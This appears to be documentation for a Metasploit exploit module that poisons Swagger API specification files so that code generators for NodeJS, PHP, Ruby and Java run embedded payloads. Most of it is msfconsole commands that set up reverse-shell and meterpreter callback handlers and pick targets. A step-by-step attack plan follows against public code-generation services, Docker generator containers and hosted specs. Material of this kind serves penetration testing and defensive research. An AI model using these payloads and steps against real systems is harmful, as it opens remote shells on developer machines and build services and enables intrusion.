William Vu
3.8 KiB
The Swagger CodeGen parameter injector module generates a Swagger JSON file with embedded Metasploit payloads.
In the typical case, a Swagger document defines an API. Swagger can be automatically consumed to generate client/server code, testing and scaffolding in APIs by companies eager to provide value to the increasing need for scalable API deployment and testing.
Currently, this module supports 4 languages for delivery: NodeJS, PHP, Ruby, and Java. These are specified by the PAYLOAD set for the exploit module.
Verification Steps
All exploits assume a bind or reverse-tcp callback handler, with preference on reverse-tcp.
- Start msfconsole
- Start a callback handler listening for a the appropriate payload (e.g.)
use exploit/multi/handler
set PAYLOAD nodejs/shell_reverse_tcp
set LHOST 192.168.68.138
set LPORT 4444
run
- Pick a target
Targets
NodeJS
This attack injects a payload into javascript by terminating a URL path string.
use exploit/multi/fileformat/swagger_param_inject
set TARGET 0
set PAYLOAD nodejs/shell_reverse_tcp
set INFO_VERSION "1.0.0"
set SWAGGER_HOST "localhost"
run
PHP
This attack injects a payload into PHP multiline comment area.
use exploit/multi/fileformat/swagger_param_inject
set TARGET 1
set PAYLOAD php/meterpreter/reverse_tcp
set SWAGGER_HOST "localhost"
run
ruby
This attack injects a payload into ruby multiline comment area.
use exploit/multi/fileformat/swagger_param_inject
set TARGET 3
set PAYLOAD ruby/shell_reverse_tcp
set SWAGGER_HOST "localhost"
run
Java
This attack injects a payload into Java by terminating a URL path string.
use exploit/multi/fileformat/swagger_param_inject
set TARGET 2
set PAYLOAD java/jsp_shell_reverse_tcp
set SWAGGER_HOST "localhost"
run
Quick Test
Use the online editor.swagger.io to upload your swagger document, and generate pre-built code bases from the document. The swagger editor leverages generator.swagger.io to build these clients & servers automatically from the document, and published downloadable artifacts of these code bases.
Scenarios
Effective against services with either these dependencies
- swagger-codegen
- public API generator.swagger.io
- public docker container swagger-generator/
- swagger-test-templates
Possible Attack approach.
- Research the target environment and component dependencies.
- Setup appropriate payload callback listener.
- generate the appropriate swagger document with associated MS payload (see above for examples)
Against a webservice (2nd order attack / blind code-gen)
Who knows what insecurely configured code-gen Docker containers hosted in data compute or API broker cluster could do if given the chance...
- Feed the document to the service in service appropriate submission of Swagger documents. This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
- Wait for callback handler event.
Against a code repository or public hosting of spec
People and Robots trust swagger to build clients, servers, mocks, and more. Publicly hosted specs should be verified as to not corrupt automatic code generation.
- Feed the document to the service in service appropriate submission of Swagger documents. This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
- Wait for callback handler event.